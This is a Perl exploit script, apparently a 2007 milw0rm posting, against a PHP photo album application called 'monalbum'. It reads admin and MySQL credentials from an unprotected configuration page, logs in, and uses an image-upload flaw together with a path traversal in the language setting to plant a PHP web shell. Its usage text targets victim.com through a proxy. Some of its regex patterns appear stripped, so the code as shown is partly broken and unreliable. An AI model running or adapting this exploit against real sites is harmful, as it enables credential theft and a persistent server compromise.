#!/usr/bin/env perl use strict; use warnings; ############################################### use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my (%args, $user, $password, $sql_host, $sql_user, $sql_password, $cookie, $path, $file, $upload) = (); my $tmp = 'cmd1.jpg'; getopts("u:a:f:p:", \%args); ####################################################################### # -a don't retrieve login and passwords, use from command line instead# # -u vuln url # # -f local php-shell # # -p http proxy # ####################################################################### if(!$args{u}) { &usage(); exit(0);} if(defined $args{a}){ ($user,$password) = split(':',$args{a}); } if(!$args{a}){ my $ua= new LWP::UserAgent; $ua->agent("Mozilla/5.0"); if(defined $args{p}){$ua->proxy('http', "http://$args{p}");} $ua->max_redirect(0); $args{u} =~ s%/$%%i; my $request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_configuration.php"); my $document = $ua->request($request); my $response = $document->as_string; $response =~ m%%is; $user = $1; $response =~ m%%is; $password = $1; $response =~ m%%is; $sql_host = $1; $response =~ m%%is; $sql_user = $1; $response =~ m%%is; $sql_password = $1; print("########################################################################\n"); if(defined $user && defined $password){ print "#Admin Panel: $user\t$password \n"; print("########################################################################\n"); print "#Mysql Details: $sql_host\t$sql_user\t$sql_password \n"; }else{ print "#Failed... #\n"; exit(0); } } goto _EXIT_ unless defined $args{f}; my $ua= new LWP::UserAgent; $ua->agent("Mozilla/5.0"); if(defined $args{p}){$ua->proxy('http', "http://$args{p}");} $args{u} =~ s%/$%%i; my $request = HTTP::Request::Common::POST( "$args{u}/admin/login_page.php", Content_Type => 'application/x-www-form-urlencoded', Referer => "$args{u}/admin/login_page.php", Content => [ login_adm => "$user", pass_adm => "$password", send => "Enter" ] ); my $document = $ua->request($request); my $response = $document->as_string; if($response =~ m/document\.location\.replace\(\'\.\.\/admin\.php\'\)/i){ print("########################################################################\n"); print "#Login successfull #\n"; $response =~ m%Set-Cookie: (.*?);%is; $cookie = $1; }else{ print("########################################################################\n"); print "#Login failed #\n"; goto _EXIT_; } $ua->default_headers->push_header('Cookie' => "$cookie"); $request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_ajouter_img.php"); $document = $ua->request($request); $response = $document->as_string; $response =~ m%
%i; $upload = $1; $request = HTTP::Request::Common::POST( "$args{u}/admin/$upload", Content_Type => 'multipart/form-data', Referer => "$args{u}/admin/admin_ajouter_img.php", Content => [ MAX_FILE_SIZE => "1000000", userfile => [$args{f}], Content_Type => "image/jpeg" ] ); $document = $ua->request($request); $response = $document->as_string; #print $response; $response =~ m%is not a valid JPEG file in (.*?)<\/b>%i; #/var/www/web70/html/monalbum/admin/admin_ajouter_img.php #print $1; $path = $1; $path =~ s%/admin/admin_ajouter_img\.php%%i; $path .= "/images"; #print $path; $args{f} =~ m/([\w\.\-]+)$/i; $file = $1; open TEMP,">$tmp" || die "Can't open $tmp: $!\n"; print TEMP ""; close(TEMP); $request = HTTP::Request::Common::POST( "$args{u}/admin/$upload", Content_Type => 'multipart/form-data', Referer => "$args{u}/admin/admin_ajouter_img.php", Content => [ MAX_FILE_SIZE => "1000000", userfile => [$tmp], Content_Type => "image/jpeg" ] ); $document = $ua->request($request); $request = HTTP::Request::Common::POST( "$args{u}/admin/admin_configuration.php", Content_Type => 'multipart/form-data', Referer => "$args{u}/admin/admin_configuration.php", Content => [ glangage => "../images/$tmp", Save => "Save" ] ); $document = $ua->request($request); $ua->max_redirect(0); $request = new HTTP::Request( 'HEAD' => "$args{u}/images/$file.php"); $document = $ua->request($request); if($document->is_success){ print("########################################################################\n"); print "#Shell Uploaded Successfull! #\n"; print "#U may now try: $args{u}/images/$file.php \n"; }else{ print("########################################################################\n"); print "#Something went wrong!!! #\n"; } _EXIT_: unlink($tmp); print("########################################################################\n"); exit(0); sub usage { print("########################################################################### # -a using account from command line # # -u vuln url # # -f local php-shell (optional) # # -p http proxy (optional) # ########################################################################### # : perl sp.pl -u http://victim.com/monalbum/ -p 75.34.123.215:9629 # # : perl sp.pl -u http://victim.com/monalbum/ -f shell.jpg # # : perl sp.pl -u http://victim.com/monalbum/ -a admin:admin -f shell.jpg # # this lame script was coded by v0l4arrra # ########################################################################### " ); } # milw0rm.com [2007-12-10]